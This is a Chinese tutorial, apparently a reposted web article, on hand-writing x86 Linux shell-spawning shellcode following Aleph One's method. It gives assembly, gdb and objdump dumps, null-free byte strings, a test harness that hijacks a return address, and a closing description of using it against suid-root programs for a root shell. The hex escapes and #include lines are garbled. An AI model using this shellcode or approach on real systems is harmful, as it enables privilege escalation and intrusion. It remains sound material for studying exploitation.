Linux下的shellcode书写-红联Linux系统门户

概述：

aleph1书写了这篇经典文章，首先要向他致敬。
tt整理翻译了它，其次就是要向他表示衷心的感谢。

该篇文章由浅入深地详细介绍了整个书写shellcode的步骤，
并给出了图示帮助理解。文章中涉及到了一些工具的使用，
要求具备汇编语言、编译原理的基础知识，如果你对此不
了解的话，我建议你不要看下去，而是应该回头学习更基础
的东西。gdb、objdump、vi、gcc等等工具你必须学会使用，
你必须了解call命令、int命令与普通jmp命令的区别所在，
你还应该知道函数从c语言编译到机器码时做了什么工作。
如果所有的这一切都不成问题，你可以开始了。
come on，baby!

测试：

RedHat 6.0/Intel PII

目录：

★ 让我们开始吧

1. vi shellcode.c
2. gcc -o shellcode -ggdb -static shellcode.c
3. gdb shellcode
4. 研究 main() 函数的汇编代码
5. 研究 execve() 函数的执行过程
6. vi shellcode_exit.c
7. gcc -o shellcode_exit -static shellcode_exit.c
8. gdb shellcode_exit
9. 研究 exit() 函数的执行过程
10. 整个过程的伪汇编代码
11. 观察堆栈分布情况
12. 修改后的伪汇编代码
13. 调整汇编代码
14. 观察当前堆栈
15. vi shellcodeasm.c
16. gcc -o shellcodeasm -g -ggdb shellcodeasm.c
17. gdb shellcodeasm
18. 验证shellcode
19. 最后的调整
20. 验证最后调整得到的shellcode

★ 我对shellcode以及这篇文章的看法

1. 你是从DOS年代过来的吗？
2. 关于文章中的一些技术说明
3. 如何写Sun工作站上的shellcode？

★ 让我们开始吧

1. vi shellcode.c

#include
int main ( int argc, char * argv[] )
{
char * name[2];
name[0] = "/bin/ksh";
name[1] = NULL;
execve( name[0], name, NULL );
return 0;
}

2. gcc -o shellcode -ggdb -static shellcode.c

3. gdb shellcode

[scz@ /home/scz/src]> gdb shellcode
GNU gdb 4.17.0.11 with Linux support
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble main <-- -- -- 输入
Dump of assembler code for function main:
0x80481a0 : pushl %ebp
0x80481a1 : movl %esp,%ebp
0x80481a3 : subl $0x8,%esp
0x80481a6 : movl $0x806f308,0xfffffff8(%ebp)
0x80481ad : movl $0x0,0xfffffffc(%ebp)
0x80481b4 : pushl $0x0
0x80481b6 : leal 0xfffffff8(%ebp),%eax
0x80481b9 : pushl %eax
0x80481ba : movl 0xfffffff8(%ebp),%eax
0x80481bd : pushl %eax
0x80481be : call 0x804b9b0 <__execve>
0x80481c3 : addl $0xc,%esp
0x80481c6 : xorl %eax,%eax
0x80481c8 : jmp 0x80481d0
0x80481ca : leal 0x0(%esi),%esi
0x80481d0 : leave
0x80481d1 : ret
End of assembler dump.
(gdb) disas __execve <-- -- -- 输入
Dump of assembler code for function __execve:
0x804b9b0 <__execve>: pushl %ebx
0x804b9b1 <__execve+1>: movl 0x10(%esp,1),%edx
0x804b9b5 <__execve+5>: movl 0xc(%esp,1),%ecx
0x804b9b9 <__execve+9>: movl 0x8(%esp,1),%ebx
0x804b9bd <__execve+13>: movl $0xb,%eax
0x804b9c2 <__execve+18>: int $0x80
0x804b9c4 <__execve+20>: popl %ebx
0x804b9c5 <__execve+21>: cmpl $0xfffff001,%eax
0x804b9ca <__execve+26>: jae 0x804bcb0 <__syscall_error>
0x804b9d0 <__execve+32>: ret
End of assembler dump.

4. 研究 main() 函数的汇编代码

0x80481a0 : pushl %ebp # 保存原来的栈基指针
# 栈基指针与堆栈指针不是一个概念
# 栈基指针对应栈底，堆栈指针对应栈顶
0x80481a1 : movl %esp,%ebp # 修改得到新的栈基指针
# 与我们以前在dos下汇编格式不一样
# 这个语句是说把esp的值赋给ebp
# 而在dos下，正好是反过来的，一定要注意
0x80481a3 : subl $0x8,%esp # 堆栈指针向栈顶移动八个字节
# 用于分配局部变量的存储空间
# 这里具体就是给 char * name[2] 预留空间
# 因为每个字符指针占用4个字节，总共两个指针
0x80481a6 : movl $0x806f308,0xfffffff8(%ebp)
# 将字符串"/bin/ksh"的地址拷贝到name[0]
# name[0] = "/bin/ksh";
# 0xfffffff8(%ebp) 就是 ebp - 8 的意思
# 注意堆栈的增长方向以及局部变量的分配方向
# 先分配name[0]后分配name[1]的空间
0x80481ad : movl $0x0,0xfffffffc(%ebp)
# 将NULL拷贝到name[1]
# name[1] = NULL;
0x80481b4 : pushl $0x0
# 按从右到左的顺序将execve()的三个参数依次压栈
# 首先压入 NULL (第三个参数)
# 注意pushl将压入一个四字节长的0
0x80481b6 : leal 0xfffffff8(%ebp),%eax
# 将 ebp - 8 本身放入eax寄存器中
# leal的意思是取地址，而不是取值
0x80481b9 : pushl %eax # 其次压入 name
0x80481ba : movl 0xfffffff8(%ebp),%eax
0x80481bd : pushl %eax # 将 ebp - 8 本身放入eax寄存器中
# 最后压入 name[0]
# 即 "/bin/ksh" 字符串的地址
0x80481be : call 0x804b9b0 <__execve>
# 开始调用 execve()
# call指令首先会将返回地址压入堆栈
0x80481c3 : addl $0xc,%esp
# esp + 12
# 释放为了调用 execve() 而压入堆栈的内容
0x80481c6 : xorl %eax,%eax
0x80481c8 : jmp 0x80481d0
0x80481ca : leal 0x0(%esi),%esi
0x80481d0 : leave
0x80481d1 : ret

5. 研究 execve() 函数的执行过程

Linux在寄存器里传递它的参数给系统调用，用软件中断跳到kernel模式(int $0x80)

0x804b9b0 <__execve>: pushl %ebx # ebx压栈
0x804b9b1 <__execve+1>: movl 0x10(%esp,1),%edx
# 把 esp + 16 本身赋给edx
# 为什么是16，因为栈顶现在是ebx
# 下面依次是返回地址、name[0]、name、NULL
# edx --> NULL
0x804b9b5 <__execve+5>: movl 0xc(%esp,1),%ecx
# 把 esp + 12 本身赋给 ecx
# ecx --> name
# 命令的参数数组，包括命令自己
0x804b9b9 <__execve+9>: movl 0x8(%esp,1),%ebx
# 把 esp + 8 本身赋给 ebx
# ebx --> name[0]
# 命令本身，"/bin/ksh"
0x804b9bd <__execve+13>: movl $0xb,%eax
# 设置eax为0xb，这是syscall表中的索引
# 0xb对应execve
0x804b9c2 <__execve+18>: int $0x80
# 软件中断，转入kernel模式
0x804b9c4 <__execve+20>: popl %ebx
# 恢复ebx
0x804b9c5 <__execve+21>: cmpl $0xfffff001,%eax
0x804b9ca <__execve+26>: jae 0x804bcb0 <__syscall_error>
# 判断返回值，报告可能的系统调用错误
0x804b9d0 <__execve+32>: ret # execve() 调用返回
# 该指令会用压在堆栈中的返回地址

从上面的分析可以看出，完成 execve() 系统调用，我们所要做的不过是这么几项而已：

a) 在内存中有以NULL结尾的字符串"/bin/ksh"
b) 在内存中有"/bin/ksh"的地址，其后是一个 unsigned long 型的NULL值
c) 将0xb拷贝到寄存器EAX中
d) 将"/bin/ksh"的地址拷贝到寄存器EBX中
e) 将"/bin/ksh"地址的地址拷贝到寄存器ECX中
f) 将 NULL 拷贝到寄存器EDX中
g) 执行中断指令int $0x80

如果execve()调用失败的话，程序将继续从堆栈中获取指令并执行，而此时堆栈中的数据
是随机的，通常这个程序会core dump。我们希望如果execve调用失败的话，程序可以正
常退出，因此我们必须在execve调用后增加一个exit系统调用。它的C语言程序如下：

6. vi shellcode_exit.c

#include
int main ()
{
exit( 0 );
}

7. gcc -o shellcode_exit -static shellcode_exit.c

8. gdb shellcode_exit

[scz@ /home/scz/src]> gdb shellcode_exit
GNU gdb 4.17.0.11 with Linux support
This GDB was configured as "i386-redhat-linux"...
(gdb) disas _exit <-- -- -- 输入
Dump of assembler code for function _exit:
0x804b970 <_exit>: movl %ebx,%edx
0x804b972 <_exit+2>: movl 0x4(%esp,1),%ebx
0x804b976 <_exit+6>: movl $0x1,%eax
0x804b97b <_exit+11>: int $0x80
0x804b97d <_exit+13>: movl %edx,%ebx
0x804b97f <_exit+15>: cmpl $0xfffff001,%eax
0x804b984 <_exit+20>: jae 0x804bc60 <__syscall_error>
End of assembler dump.

9. 研究 exit() 函数的执行过程

我们可以看到，exit系统调用将0x1放到EAX中(这是它的syscall索引值)，将退出码放
入EBX中，然后执行"int $0x80"。大部分程序正常退出时返回0值，我们也在EBX中放入0。
现在我们所要完成的工作又增加了三项：

a) 在内存中有以NULL结尾的字符串"/bin/ksh"

b) 在内存中有"/bin/ksh"的地址，其后是一个 unsigned long 型的NULL值
c) 将0xb拷贝到寄存器EAX中
d) 将"/bin/ksh"的地址拷贝到寄存器EBX中
e) 将"/bin/ksh"地址的地址拷贝到寄存器ECX中
f) 将 NULL 拷贝到寄存器EDX中
g) 执行中断指令int $0x80
h) 将0x1拷贝到寄存器EAX中
i) 将0x0拷贝到寄存器EBX中
j) 执行中断指令int $0x80

10. 整个过程的伪汇编代码

下面我们用汇编语言完成上述工作。我们把"/bin/ksh"字符串放到代码的后面，并且会
把字符串的地址和NULL加到字符串的后面：

------------------------------------------------------------------------------
movl string_addr,string_addr_addr #将字符串的地址放入某个内存单元中
movb $0x0,null_byte_addr #将null放入字符串"/bin/ksh"的结尾
movl $0x0,null_addr #将NULL放入某个内存单元中
movl $0xb,%eax #将0xb拷贝到EAX中
movl string_addr,%ebx #将字符串的地址拷贝到EBX中
leal string_addr_addr,%ecx #将存放字符串地址的地址拷贝到ECX中
leal null_string,%edx #将存放NULL的地址拷贝到EDX中
int $0x80 #执行中断指令int $0x80 (execve()完成)
movl $0x1, %eax #将0x1拷贝到EAX中
movl $0x0, %ebx #将0x0拷贝到EBX中
int $0x80 #执行中断指令int $0x80 (exit(0)完成)
/bin/ksh string goes here. #存放字符串"/bin/ksh"
------------------------------------------------------------------------------

11. 观察堆栈分布情况

现在的问题是我们并不清楚我们正试图exploit的代码和我们要放置的字符串在内存中
的确切位置。一种解决的方法是用一个jmp和call指令。jmp和call指令可以用IP相关寻址，
也就是说我们可以从当前正要运行的地址跳到一个偏移地址处执行，而不必知道这个地址
的确切数值。如果我们将call指令放在字符串"/bin/ksh"的前面，然后jmp到call指令的位置，
那么当call指令被执行的时候，它会首先将下一个要执行指令的地址(也就是字符串的地址
)压入堆栈。我们可以让call指令直接调用我们shellcode的开始指令，然后将返回地址(字符
串地址)从堆栈中弹出到某个寄存器中。假设J代表JMP指令，C代表CALL指令，S代表其他指令，
s代表字符串"/bin/ksh"，那么我们执行的顺序就象下图所示:

内存 DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF 内存
低端 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF 高端
buffer sfp ret a b c

<------ [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
^|^ ^| |
|||_____________||____________| (1)
(2) ||_____________||
|______________| (3)
栈顶栈底

sfp : 栈基指针
ret : 返回地址
a,b,c: 函数入口参数

(1)用0xD8覆盖返回地址后，子函数返回时将跳到0xD8处开始执行，也就是我们shellcode
的起始处
(2)由于0xD8处是一个jmp指令，它直接跳到了0xE8处执行我们的call指令
(3)call指令先将返回地址(也就是字符串地址)0xEA压栈后,跳到0xDA处开始执行

12. 修改后的伪汇编代码

经过上述修改后,我们的汇编代码变成了下面的样子:

------------------------------------------------------------------------------
jmp offset-to-call # 3 bytes 1.首先跳到call指令处去执行
popl %esi # 1 byte 3.从堆栈中弹出字符串地址到ESI中
movl %esi,array-offset(%esi) # 3 bytes 4.将字符串地址拷贝到字符串后面
movb $0x0,nullbyteoffset(%esi)# 4 bytes 5.将null字节放到字符串的结尾
movl $0x0,null-offset(%esi) # 7 bytes 6.将null长字放到字符串地址的地址后面
movl $0xb,%eax # 5 bytes 7.将0xb拷贝到EAX中
movl %esi,%ebx # 2 bytes 8.将字符串地址拷贝到EBX中
leal array-offset(%esi),%ecx # 3 bytes 9.将字符串地址的地址拷贝到ECX
leal null-offset(%esi),%edx # 3 bytes 10.将null串的地址拷贝到EDX
int $0x80 # 2 bytes 11.调用中断指令int $0x80
movl $0x1, %eax # 5 bytes 12.将0x1拷贝到EAX中
movl $0x0, %ebx # 5 bytes 13.将0x0拷贝到EBX中
int $0x80 # 2 bytes 14.调用中断int $0x80
call offset-to-popl # 5 bytes 2.将返回地址压栈，跳到popl处执行
/bin/ksh string goes here.
------------------------------------------------------------------------------

13. 调整汇编代码

计算一下从jmp到call和从call到popl，以及从字符串地址到name数组，从字符串地址到
null串的偏移量，我们得到下面的程序:

------------------------------------------------------------------------------
jmp 0x2a # 3 bytes 1.首先跳到call指令处去执行
popl %esi # 1 byte 3.从堆栈中弹出字符串地址到ESI中
movl %esi,0x9(%esi) # 3 bytes 4.将字符串地址拷贝到字符串后面
movb $0x0,0x8(%esi) # 4 bytes 5.将null字节放到字符串尾部
movl $0x0,0xd(%esi) # 7 bytes 6.将null长字放到字符串地址后
movl $0xb,%eax # 5 bytes 7.将0xb拷贝到EAX中
movl %esi,%ebx # 2 bytes 8.将字符串地址拷贝到EBX中
leal 0x9(%esi),%ecx # 3 bytes 9.将字符串地址的地址拷贝到ECX
leal 0xd(%esi),%edx # 3 bytes 10.将null串的地址拷贝到EDX
int $0x80 # 2 bytes 11.调用中断指令int $0x80
movl $0x1, %eax # 5 bytes 12.将0x1拷贝到EAX中
movl $0x0, %ebx # 5 bytes 13.将0x0拷贝到EBX中
int $0x80 # 2 bytes 14.调用中断int $0x80
call -0x2f # 5 bytes 2.将返回地址压栈,跳到popl处执行
.string "/bin/ksh" # 9 bytes
------------------------------------------------------------------------------

14. 观察当前堆栈

当上述过程执行到第7步时，我们可以看一下这时堆栈中的情况
假设字符串的地址是0xbfffc5f0:

|........ |
|---------|0xbfffc5f0 %esi 字符串地址
| / |
|---------|
| |
|---------|
| i |
|---------|
| |
|---------|
| / |
|---------|
| k |
|---------|
| s |
|---------|
| h |
|---------|0xbfffc5f8 0x8(%esi) null字节的地址
| 0 |
|---------|0xbfffc5f9 0x9(%esi) 存放字符串指针的地址即name[0] 大小是4个字节
| 0xbf |
|---------|注: 这四个字节实际可能并不是按顺序存储的，也许是按0xf0c5ffbf的顺序。
| 0xff | 我没有验证过，只是为了说明问题，简单的这么写了一下。
|---------|
| 0xc5 |
|---------|
| 0xf0 |
|---------|0xbfffc5fd 0xd(%esi) 空串的地址即name[1] 大小是4个字节
| 0 |
|---------|
| 0 |
|---------|
| 0 |
|---------|
| 0 |
|---------|
| ....... |

15. vi shellcodeasm.c

为了证明它能正常工作，我们必须编译并运行它。但这里有个问题，我们的代码要自己修
改自己，而大部分操作系统都将代码段设为只读，为了绕过这个限制，我们必须将我们希望
执行的代码放到堆栈或数据段中，并且转向执行它，可以将代码放到数据段的一个全局
数组中。首先需要得到二进制码的16进制形式，可以先编译，然后用GDB得到我们所要的东西

int main ()
{
__asm__
("
jmp 0x2a # 3 bytes
popl %esi # 1 byte
movl %esi,0x9(%esi) # 3 bytes
movb $0x0,0x8(%esi) # 4 bytes
movl $0x0,0xd(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x9(%esi),%ecx # 3 bytes
leal 0xd(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string "/bin/ksh" # 9 bytes
");
}

16. gcc -o shellcodeasm -g -ggdb shellcodeasm.c

17. gdb shellcodeasm

[scz@ /home/scz/src]> gdb shellcodeasm
GNU gdb 4.17.0.11 with Linux support
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048398 : pushl %ebp
0x8048399 : movl %esp,%ebp
0x804839b : jmp 0x80483c7
0x804839d : popl %esi
0x804839e : movl %esi,0x9(%esi)
0x80483a1 : movb $0x0,0x8(%esi)
0x80483a5 : movl $0x0,0xd(%esi)
0x80483ac : movl $0xb,%eax
0x80483b1 : movl %esi,%ebx
0x80483b3 : leal 0x9(%esi),%ecx
0x80483b6 : leal 0xd(%esi),%edx
0x80483b9 : int $0x80
0x80483bb : movl $0x1,%eax
0x80483c0 : movl $0x0,%ebx
0x80483c5 : int $0x80
0x80483c7 : call 0x804839d
0x80483cc : das
0x80483cd : boundl 0x6e(%ecx),%ebp
0x80483d0 : das
0x80483d1 : imull $0x0,0x68(%ebx),%esi
0x80483d5 : leave
0x80483d6 : ret
End of assembler dump.
(gdb) x/bx main+3 <-- -- -- 输入
0x804839b : 0xeb
(gdb)
0x804839c : 0x2a
(gdb)
...

如此下去即可得到完整的机器码。
但是我们不必如此罗嗦，昨天介绍过的objdump今天派上用场了：
objdump -j .text -Sl shellcodeasm | more
/main
得到如下结果：

08048398 :
main():
/home/scz/src/shellcodeasm.c:2
{
8048398: 55 pushl %ebp
8048399: 89 e5 movl %esp,%ebp
/home/scz/src/shellcodeasm.c:3
__asm__
804839b: eb 2a jmp 80483c7
804839d: 5e popl %esi
804839e: 89 76 09 movl %esi,0x9(%esi)
80483a1: c6 46 08 00 movb $0x0,0x8(%esi)
80483a5: c7 46 0d 00 00 00 00 movl $0x0,0xd(%esi)
80483ac: b8 0b 00 00 00 movl $0xb,%eax
80483b1: 89 f3 movl %esi,%ebx
80483b3: 8d 4e 09 leal 0x9(%esi),%ecx
80483b6: 8d 56 0d leal 0xd(%esi),%edx
80483b9: cd 80 int $0x80
80483bb: b8 01 00 00 00 movl $0x1,%eax
80483c0: bb 00 00 00 00 movl $0x0,%ebx
80483c5: cd 80 int $0x80
80483c7: e8 d1 ff ff ff call 804839d
80483cc: 2f das
80483cd: 62 69 6e boundl 0x6e(%ecx),%ebp
80483d0: 2f das
80483d1: 6b 73 68 00 imull $0x0,0x68(%ebx),%esi
/home/scz/src/shellcodeasm.c:21
("
jmp 0x2a # 3 bytes
popl %esi # 1 byte
movl %esi,0x9(%esi) # 3 bytes
movb $0x0,0x8(%esi) # 4 bytes
movl $0x0,0xd(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x9(%esi),%ecx # 3 bytes
leal 0xd(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string "/bin/ksh" # 9 bytes
");
}
80483d5: c9 leave
80483d6: c3 ret
80483d7: 90 nop

整理shellcode如下：

eb 2a 5e 89 76 09 c6 46 08 00 c7 46 0d 00 00 00 00 b8 0b 00
00 00 89 f3 8d 4e 09 8d 56 0d cd 80 b8 01 00 00 00 bb 00 00
00 00 cd 80 e8 d1 ff ff ff 2f 62 69 6e 2f 6b 73 68 00 c9 c3

18. 验证shellcode

vi shelltest.c

char shellcode[] =
"xebx2ax5ex89x76x09xc6x46x08x00xc7x46x0dx00x00x00x00xb8x0bx00"
"x00x00x89xf3x8dx4ex09x8dx56x0dxcdx80xb8x01x00x00x00xbbx00x00"
"x00x00xcdx80xe8xd1xffxffxffx2fx62x69x6ex2fx6bx73x68x00xc9xc3";

int main ()
{
int * ret; /* 当前esp指向的地址保存ret的值 */

ret = ( int * )&ret + 2; /* 得到 esp + 2 * 4，那是返回地址IP */
( *ret ) = ( int )shellcode; /* 修改了 main() 函数的返回地址，那是很重要的一步 */
}

[scz@ /home/scz/src]> gcc -o shelltest shelltest.c
[scz@ /home/scz/src]> ./shelltest
$ exit
[scz@ /home/scz/src]>

那说明一切都成功了！为了帮助你理解，我们还是来看看这段程序究竟做了什么：

objdump -j .text -Sl shelltest | more
/main
得到如下结果：

08048398 :
main():
8048398: 55 pushl %ebp
8048399: 89 e5 movl %esp,%ebp
804839b: 83 ec 04 subl $0x4,%esp # 给局部变量预留空间
804839e: 8d 45 fc leal 0xfffffffc(%ebp),%eax # ebp - 4 => eax
# 取了栈顶指针
# 为什么不直接用esp赋值？
80483a1: 8d 50 08 leal 0x8(%eax),%edx # eax + 8 => edx
# edx现在指向IP
80483a4: 89 55 fc movl %edx,0xfffffffc(%ebp) # edx => [ ebp - 4 ]
# 把IP的地址放入局部变量中
80483a7: 8b 45 fc movl 0xfffffffc(%ebp),%eax # ebp - 4 => eax
# eax现在保存着IP的地址
80483aa: c7 00 40 94 04 08 movl $0x8049440,(%eax) # 修改了返回地址
80483b0: c9 leave
80483b1: c3 ret
80483b2: 90 nop

19. 最后的调整

它现在工作了，但还有个小问题。大多数情况下我们都是试图overflow一个字符型
buffer，因此在我们的shellcode中任何的null字节都会被认为是字符串的结束，copy过程
就被中止了。因此要使exploit工作，shellcode中不能有null字节，我们可以略微调整一
下代码：

有问题的指令替代指令
--------------------------------------------------------
movb $0x0,0x8(%esi) xorl %eax,%eax
movl $0x0,0xd(%esi) movb %eax,0x8(%esi)
movl %eax,0xd(%esi)
--------------------------------------------------------
movl $0xb,%eax movb $0xb,%al
--------------------------------------------------------
movl $0x1, %eax xorl %ebx,%ebx
movl $0x0, %ebx movl %ebx,%eax
inc %eax
--------------------------------------------------------

我们改进后的代码如下：

vi shellcodeasm.c

int main ()
{
__asm__
("
jmp 0x1f # 3 bytes
popl %esi # 1 byte
movl %esi,0x9(%esi) # 3 bytes
xorl %eax,%eax # 2 bytes
movb %eax,0x8(%esi) # 3 bytes
movl %eax,0xd(%esi) # 3 bytes
movb $0xb,%al # 2 bytes
movl %esi,%ebx # 2 bytes
leal 0x9(%esi),%ecx # 3 bytes
leal 0xd(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
xorl %ebx,%ebx # 2 bytes
movl %ebx,%eax # 2 bytes
inc %eax # 1 bytes
int $0x80 # 2 bytes
call -0x24 # 5 bytes
.string "/bin/ksh" # 9 bytes
# 48 bytes total
");
}

[scz@ /home/scz/src]> gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[scz@ /home/scz/src]> gdb shellcodeasm
GNU gdb 4.17.0.11 with Linux support
This GDB was configured as "i386-redhat-linux"...
(gdb) disas main
Dump of assembler code for function main:
0x8048398 : pushl %ebp
0x8048399 : movl %esp,%ebp
0x804839b : jmp 0x80483bc
0x804839d : popl %esi
0x804839e : movl %esi,0x9(%esi)
0x80483a1 : xorl %eax,%eax
0x80483a3 : movb %al,0x8(%esi)
0x80483a6 : movl %eax,0xd(%esi)
0x80483a9 : movb $0xb,%al
0x80483ab : movl %esi,%ebx
0x80483ad : leal 0x9(%esi),%ecx
0x80483b0 : leal 0xd(%esi),%edx
0x80483b3 : int $0x80
0x80483b5 : xorl %ebx,%ebx
0x80483b7 : movl %ebx,%eax
0x80483b9 : incl %eax
0x80483ba : int $0x80
0x80483bc : call 0x804839d
0x80483c1 : das
0x80483c2 : boundl 0x6e(%ecx),%ebp
0x80483c5 : das
0x80483c6 : imull $0x0,0x68(%ebx),%esi
0x80483ca : leave
0x80483cb : ret
End of assembler dump.
(gdb)

objdump -j .text -Sl shellcodeasm | more
/main
得到如下结果：

08048398 :
main():
/home/scz/src/shellcodeasm.c:2
{
8048398: 55 pushl %ebp
8048399: 89 e5 movl %esp,%ebp
/home/scz/src/shellcodeasm.c:3
__asm__
804839b: eb 1f jmp 80483bc
804839d: 5e popl %esi
804839e: 89 76 09 movl %esi,0x9(%esi)
80483a1: 31 c0 xorl %eax,%eax
80483a3: 88 46 08 movb %al,0x8(%esi)
80483a6: 89 46 0d movl %eax,0xd(%esi)
80483a9: b0 0b movb $0xb,%al
80483ab: 89 f3 movl %esi,%ebx
80483ad: 8d 4e 09 leal 0x9(%esi),%ecx
80483b0: 8d 56 0d leal 0xd(%esi),%edx
80483b3: cd 80 int $0x80
80483b5: 31 db xorl %ebx,%ebx
80483b7: 89 d8 movl %ebx,%eax
80483b9: 40 incl %eax
80483ba: cd 80 int $0x80
80483bc: e8 dc ff ff ff call 804839d
80483c1: 2f das
80483c2: 62 69 6e boundl 0x6e(%ecx),%ebp
80483c5: 2f das
80483c6: 6b 73 68 00 imull $0x0,0x68(%ebx),%esi
/home/scz/src/shellcodeasm.c:24
("
jmp 0x1f # 3 bytes
popl %esi # 1 byte
movl %esi,0x9(%esi) # 3 bytes
xorl %eax,%eax # 2 bytes
movb %eax,0x8(%esi) # 3 bytes
movl %eax,0xd(%esi) # 3 bytes
movb $0xb,%al # 2 bytes
movl %esi,%ebx # 2 bytes
leal 0x9(%esi),%ecx # 3 bytes
leal 0xd(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
xorl %ebx,%ebx # 2 bytes
movl %ebx,%eax # 2 bytes
inc %eax # 1 bytes
int $0x80 # 2 bytes
call -0x24 # 5 bytes
.string "/bin/ksh" # 9 bytes
# 48 bytes total
");
}
80483ca: c9 leave
80483cb: c3 ret
80483cc: 90 nop

整理shellcode如下：

eb 1f 5e 89 76 09 31 c0 88 46 08 89 46 0d b0 0b
89 f3 8d 4e 09 8d 56 0d cd 80 31 db 89 d8 40 cd
80 e8 dc ff ff ff 2f 62 69 6e 2f 6b 73 68 00 c9 c3

20. 验证最后调整得到的shellcode

vi shelltest.c

char shellcode[] =
"xebx1fx5ex89x76x09x31xc0x88x46x08x89x46x0dxb0x0b"
"x89xf3x8dx4ex09x8dx56x0dxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxffx2fx62x69x6ex2fx6bx73x68x00xc9xc3";

int main ()
{
int * ret; /* 当前esp指向的地址保存ret的值 */

ret = ( int * )&ret + 2; /* 得到 esp + 2 * 4，那是返回地址IP */
( *ret ) = ( int )shellcode; /* 修改了 main() 函数的返回地址，那是很重要的一步 */
}

[scz@ /home/scz/src]> gcc -o shelltest shelltest.c
[scz@ /home/scz/src]> ./shelltest
$ exit
[scz@ /home/scz/src]>

现在你已经明白了怎么写shellcode了，并不象想象中那么难，是吧？:-)
这里介绍的仅仅是一个写shellcode的思路以及需要注意的一些问题。
你可以根据自己的需要，编写出自己的shellcode来。

★ 我对shellcode以及这篇文章的看法

1. 你是从DOS年代过来的吗？

如果答案肯定，我就不多说了，因为上面通篇实际上并没有超出当年我们
在DOS游戏汇编的范畴，毕竟Linux跑在Intel x86架构上。当发生far call的
时候，cs:ip对被压栈，先是ip后是cs，现在想起来为什么上面的介绍那么地
似曾相识了吧。int发生的时候不过多压了个flag而已。那么far jmp就更不
用多说。回忆，再回忆，回忆那些当年我们为之付出心血的DOS下的汇编语言。
ret、iret、int 3、int 21、int 1，TSR，你还能想起什么尘封了的往事。

通过修改堆栈中的返回地址将程序流程引导到别处，曾经是dos下的家常便饭，
为了防止中断向量被修改，宁可远程call远程跳转也不愿意使用int指令，编写
自己的debug程序，利用int 1的单步，难道你没有修改过堆栈中的返回地址？
为了嵌入那些当前编译器不支持的机器码，用db直接插入机器码。为了提高某些
关键代码的执行效率，使用嵌入式汇编，难道你从来没有看过.s文件？

不再回忆，DOS已是昨天。

2. 关于文章中的一些技术说明

原文是用/bin/sh的，我为了从头实际演练一番，用了/bin/ksh，你要是
乐意可以使用任意的shell。其次，可能是原文有误，要么是翻译中书写错误，
反正是有那么几处错误，我都一一调整过来了。原文是用gdb那样获得完整的
shellcode的，而我昨天刚刚介绍了objdump的使用，所以也可以利用objdump
获得shellcode，上文中已经多次给出了完整的命令。

最后的shelltest，我给加上了注释，因为你可能看到最后没有理解shellcode
如何被执行的。因为c编译器给main()函数前后都加了启动结束代码，main()
函数也是被调用的，也有自己的返回地址，所以程序中修改main()的返回地址
使得shellcode被执行。所以，你不能在main()函数的最后调用exit(0)。因为
函数的形式参数先于返回地址压栈，所以即使成了
int main ( int argc, char * argv[] )
也不影响返回地址的修改。

定义ret局部变量就意味着esp已经获得，必须明确理解这一点。

这里仅仅介绍了如何写自己的shellcode，并没有介绍缓冲区溢出本身。
简单说两句。从纯粹的攻击角度而言，首先要寻找那些suid/sgid的属主
是root的应用程序，然后判断该应用程序是否可能发生缓冲区溢出，继而
抢在应用程序结束之前嵌入自己的shellcode，因为应用程序结束之前一般
而言还处在suid状态，那么此时执行的shellcode也就具有了suid特性，
于是拥有root权限的shell展现在你的眼前，还等什么？关于缓冲区溢出
本身回头再经典回放，力争做到通俗易懂，可以照猫画老虎，今天不提它了，:-)

3. 如何写Sun工作站上的shellcode？

建议去绿色兵团的Unix系统安全论坛学习这方面的知识，tt目前坐镇那里，
倒是展开了不少技术讨论，你可以只看不吭声，嘿嘿。
不过，只要稍微花点时间看看answer book中关于Sun工作站上的汇编那一
部分，原理是一致的，而且GNU工具也不是没有，如果你一定喜欢gdb而不是
dbx的话，faint

我是没有Sun工作站可以用了，否则今天就以它为例子来演习，可惜。

★ 后记

最后再次向aleph1致敬，感谢tt为我们大家翻译整理了它。
要是多一些这样的朋友，系统安全一定可以得到实质性提高。
BTW，讨厌听别人说，怎么怎么黑了谁谁。

Linux下的shellcode书写

共有 0 条评论

频道文章

最新教程

随机推荐